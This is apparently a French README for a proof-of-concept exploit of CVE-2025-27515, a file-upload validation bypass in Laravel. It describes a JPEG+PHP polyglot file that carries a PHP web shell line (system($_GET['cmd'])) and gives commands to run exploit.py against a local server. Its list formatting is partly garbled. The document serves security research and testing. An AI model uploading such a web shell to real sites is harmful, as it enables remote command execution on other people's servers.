
PoC of CVE-2025-27515
Une démonstration pratique de CVE-2025-27515, une vulnérabilité de contournement de validation d'upload de fichiers dans le Framework Laravel (≤ 12.0.0).
CVE-2025-27515 est un contournement de validation qui permet aux attaquants de contourner les restrictions d'upload de fichiers lorsque les applications Laravel utilisent des motifs de validation avec joker (files.*). La vulnérabilité permet d'uploader des fichiers malveillants en exploitant des faiblesses dans la manière dont Laravel traite les uploads de fichiers basés sur des tableaux.
Sévérité : Moyenne/Élevée
CWE : CWE-20 (Validation d'entrée incorrecte)
L'exploit utilise un fichier polyglotte JPEG+PHP qui :
FF D8 FF E0) pour contourner la validation du type MIME<?php system($_GET['cmd']); ?>).jpg pour passer les vérifications d'extension de fichierphp artisan serve
# Access at http://localhost:8000/upload
Version Python :
pip3 install -r requirements.txt
python3 exploit.py http://localhost:8000
POUR USAGE ÉDUCATIF ET TESTS DE SÉCURITÉ AUTORISÉS UNIQUEMENT
Par Guaxinim | Recherche en cybersécurité